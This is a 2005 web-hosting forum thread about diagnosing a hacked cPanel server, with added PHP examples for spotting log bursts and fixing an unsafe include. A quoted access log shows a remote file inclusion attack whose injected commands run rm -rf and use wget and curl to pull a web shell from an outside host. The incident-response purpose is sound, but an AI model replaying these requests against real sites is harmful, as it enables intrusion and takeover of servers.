
possibly hacked ?

Discussion in 'General Discussion' started by ctbhost, Jul 30, 2005.

  1. ctbhost

    ctbhost Well-Known Member

    Joined:
    May 31, 2002
    Messages:
    139
    Likes Received:
    0
    Trophy Points:
    316
    In my /tmp directory there was a folder named /.x which contained the following files:

    failed.txt
    Norte11.txt
    Norte12.txt
    Norte13.txt
    Norte14.txt
    ocarteiro.htm
    ocarteiro.txt
    ok.txt

    the Nortel files contained lists of email addresses,

    What I was wondering is how these files could be placed on the server, and where, if anywhere in the logs, I can trace the source of the hacker.

    I have deleted the files and the folder from the server but really want to know what I can do to stop this happening again.

    About 6 months ago I secured my server using the information in this thread http://forums.cpanel.net/showthread.php?t=30159 and the instructions on http://eth0.us/

    Maybe there is something else I need to do.
     
  2. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,460
    Likes Received:
    21
    Trophy Points:
    463
    Location:
    Go on, have a guess
  3. ctbhost

    Thanks for that - I found a PHP script called .admin.php that allows the user to execute commands in the user's home directory.

    Only problem is the script was created the day before the logs start, so I can't seem to see how it was uploaded.
     
  4. ctbhost

    In my error_log I found a heap of lines like this.

    I have BFD and APF installed - shouldn't BFD have blocked this IP address due to so many failed attempts in such a short time??

    [Sun Jul 31 03:28:58 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:28:58 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:28:59 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:28:59 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:28:59 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:28:59 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:28:59 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:28:59 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:57 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:57 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:58 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:58 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:58 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:58 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:58 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:58 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:58 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:58 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:58 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:58 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:59 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:59 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:59 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:59 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:59 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:59 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:59 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:59 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:59 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:59 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:59 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:29:59 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:30:00 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:30:08 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:30:09 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:30:09 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:30:09 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
    [Sun Jul 31 03:30:09 2005] [error] [client 195.225.128.34] File does not exist: /home/avi/public_html/403.shtml
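The question above is whether a burst like this should have tripped the brute-force detector. The following is an added example, not code from the thread and not part of BFD or APF: it parses Apache error_log lines in the format quoted above and reports any client IP that produces more than a threshold number of entries inside a sliding time window. The window, threshold, sample IPs and log path are assumptions chosen for the example.

```php
<?php
// Added example (not from the thread, not BFD/APF code): flag client IPs that
// hammer the server, using Apache error_log lines in the format quoted above.
// Window size, threshold and the sample lines below are constructed assumptions.

function parse_error_line(string $line): ?array
{
    // Matches: [Sun Jul 31 03:28:58 2005] [error] [client 195.225.128.34] File does not exist: /path
    $re = '/^\[\w{3} (\w{3}) (\d{1,2}) (\d{2}:\d{2}:\d{2}) (\d{4})\] \[(\w+)\] \[client ([0-9A-Fa-f.:]+)\] (.*)$/';
    if (!preg_match($re, trim($line), $m)) {
        return null;
    }
    $ts = strtotime("$m[1] $m[2] $m[4] $m[3] UTC");   // the log carries no zone; treat as UTC
    if ($ts === false) {
        return null;
    }
    return ['ts' => $ts, 'level' => $m[5], 'client' => $m[6], 'msg' => $m[7]];
}

function find_bursts(iterable $lines, int $window = 60, int $threshold = 20): array
{
    $byClient = [];
    foreach ($lines as $line) {
        $e = parse_error_line($line);
        if ($e !== null) {
            $byClient[$e['client']][] = $e['ts'];
        }
    }
    $flagged = [];
    foreach ($byClient as $ip => $times) {
        sort($times);
        $start = 0;
        foreach ($times as $i => $t) {
            // slide the window start forward until events [start..i] all lie within $window seconds
            while ($t - $times[$start] > $window) {
                $start++;
            }
            $inWindow = $i - $start + 1;
            if ($inWindow >= $threshold) {
                $flagged[$ip] = max($flagged[$ip] ?? 0, $inWindow);
            }
        }
    }
    return $flagged;   // ip => peak number of entries seen inside one window
}

// Constructed sample: 30 hits in about 90 s from one address, 2 from another.
$sample = [];
for ($i = 0; $i < 30; $i++) {
    $sec   = 28 * 60 + 58 + 3 * $i;                          // 03:28:58 onwards, one hit every 3 s
    $stamp = sprintf('03:%02d:%02d', intdiv($sec, 60), $sec % 60);
    $sample[] = "[Sun Jul 31 $stamp 2005] [error] [client 203.0.113.7] File does not exist: /home/avi/public_html/403.shtml";
}
$sample[] = '[Sun Jul 31 03:40:00 2005] [error] [client 198.51.100.9] File does not exist: /home/avi/public_html/robots.txt';
$sample[] = '[Sun Jul 31 03:41:10 2005] [error] [client 198.51.100.9] File does not exist: /home/avi/public_html/favicon.ico';

foreach (find_bursts($sample) as $ip => $peak) {
    echo "$ip: $peak entries inside 60 s, candidate for a firewall deny rule\n";
}
```

Run against a real log with `find_bursts(file('/usr/local/apache/logs/error_log'))` (the path is an assumption for a cPanel build; adjust to where your Apache writes error_log). With the sample above only 203.0.113.7 is reported, with a peak of 21 entries in one 60-second window; 198.51.100.9 never reaches the threshold. A missing-file error is not a failed login, so a tool that only watches authentication failures would not count these lines; this script watches the web error log itself, which is where the burst in the thread actually shows up.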
     
  5. linux-image

    linux-image Well-Known Member

    Joined:
    Jun 8, 2004
    Messages:
    1,191
    Likes Received:
    1
    Trophy Points:
    168
    Location:
    India
    cPanel Access Level:
    Root Administrator
    BFD should have stopped that. As a quick fix, run

    touch /home/avi/public_html/403.shtml

    as root in the shell. At least you will save the bandwidth.
     
  6. ctbhost

    Yeah, I understand what you're saying, but I'm more interested in why BFD didn't pick it up - is there a way to check that BFD is working??
     
  7. linux-image

    Had it worked, you wouldn't have got so many accesses in the logs.

    In case you want to test, you will need to write a script that accesses a particular file, say 100 times in a loop, and see if BFD picks it up.

    Alternatively, I should say that mod_dosevasive is very effective at preventing DoS.
     
  8. ctbhost

    Seems that APF isn't working.

    I try to restart APF with apf -r

    and I get the error below - any idea what this means?

    iptables v1.2.9: host/network `at' not found
    Try `iptables -h' or 'iptables --help' for more information.
    iptables v1.2.9: host/network `at' not found
    Try `iptables -h' or 'iptables --help' for more information.
     
  9. ctbhost

    Found the problem:
    in /etc/apf/deny_hosts.rules there was the blocked IP list and one entry called 'at'. I removed that and all is fixed.
     
  10. ctbhost

    I have figured out how the hacker is getting in, but how do I stop them?
    In the logs there are the following entries:

    GET /index.php?show=http://www.lolsys.org/cse.gif?&cmd=cd%20ice HTTP/1.1" 200 10076 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
    GET /index.php?show=http://www.lolsys.org/cse.gif?&cmd=cd%20ice;pwd HTTP/1.1" 200 10112 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
    GET /index.php?show=http://www.lolsys.org/cse.gif?&cmd=cd%20ice;rm%20-rf%20.index.php HTTP/1.1" 200 10076 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
    GET /index.php?show=http://www.lolsys.org/cse.gif?&cmd=cd%20ice;wget%20www.lolsys.org/admin.txt HTTP/1.1" 200 10128 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
    GET /index.php?show=http://www.lolsys.org/cse.gif?&cmd=cd%20ice;curl%20-o%20admin.txt%20www.lolsys.org/admin.txt HTTP/1.1" 200 10365 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
    GET /index.php?show=http://www.lolsys.org/cse.gif?&cmd=cd%20ice;mv%20admin.txt%20.look.php HTTP/1.1" 200 10076 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
    GET /ice/.look.php?password=aihdffa HTTP/1.1" 200 1116 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"


    If I enter these in the browser after the domain name I get a page that has
    ------------------------------------------------------------------
    Sidewinder Command/Safemode Exploit 4.1


    System Information
    sysname: Linux
    nodename: [my host name]
    Release: 2.4.22-1.2199.nptl
    version: #1 Wed Aug 4 12:25:07 EDT 2004
    machine: i686

    Script Current User: USERNANME
    PHP Version: 5.0.4
    User Info: uid(32020) euid(32020) gid(522)
    Current Path: /home/user/public_html
    Server IP: xxx.xxx.xxx.xxx
    Web Server: Apache


    [*] Command Mode Run
    Command Stdout
    ------------------------------------------------------------

    Any idea how to protect against this type of attack?

    Would not allowing the string http:// in the "?show=" variable be enough, or is there a better way?
     
  11. chirpy

    You need to remove and then fix whatever that index.php script is. It's clearly exploitable.
     
  12. ctbhost

    Yeah, have found the problem - it was written when I was real new to PHP and open to exploit - I have put some extra scripting in to not allow various characters, which should stop them.

    Just gotta work out why BFD isn't working.
     
    #12 ctbhost, Aug 9, 2005
    Last edited: Aug 9, 2005
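Post 10 asks whether blocking the string "http://" in the "?show=" parameter is enough, and post 12 reports filtering out "various characters". The following is an added example, not the thread's index.php and not code from anyone in the thread: it shows the pattern that produces the "?show=http://..." log entries above, and beside it a replacement that resolves the parameter through a fixed allowlist of local pages, so no request data is ever used as an include path. The page names and file paths are assumptions chosen for the example.

```php
<?php
// Added example, not the thread's index.php. Shows the include pattern behind the
// "?show=http://..." log entries, and an allowlist-based replacement for it.

// VULNERABLE (shown for contrast, never called here): the include path comes
// straight from the query string. With remote URL fopen enabled, PHP fetches
// the URL and executes whatever it returns, which is exactly what the logs show.
function render_page_vulnerable(string $show): void
{
    include $show;   // e.g. ?show=http://example.invalid/x.txt  (constructed)
}

// HARDENED: the parameter is only ever a key into this fixed table (assumed page set).
const PAGES = [
    'home'    => 'pages/home.php',
    'about'   => 'pages/about.php',
    'contact' => 'pages/contact.php',
];

// Returns the absolute path of the page to include, or null if the key is not
// on the allowlist. No character filtering is needed: unknown values never
// reach include(), so there is no list of bad strings to keep up to date.
function resolve_page(?string $show): ?string
{
    if ($show === null || !isset(PAGES[$show])) {
        return null;
    }
    return __DIR__ . '/' . PAGES[$show];
}

function render_page(?string $show): void
{
    $file = resolve_page($show);
    if ($file === null) {
        http_response_code(404);
        echo 'Page not found';
        return;
    }
    include $file;
}

render_page($_GET['show'] ?? 'home');
```

Rejecting "http://" (or any other blacklist of characters) has to anticipate every form the attacker might use; the allowlist above only has to know the handful of pages the site actually has. As defence in depth on the interpreter side, later PHP releases let you set `allow_url_include = Off` (added in PHP 5.2, so not available on the 5.0.4 shown in the exploit page output) and `allow_url_fopen = Off` in php.ini, which stops include() from fetching remote URLs regardless of what the script does.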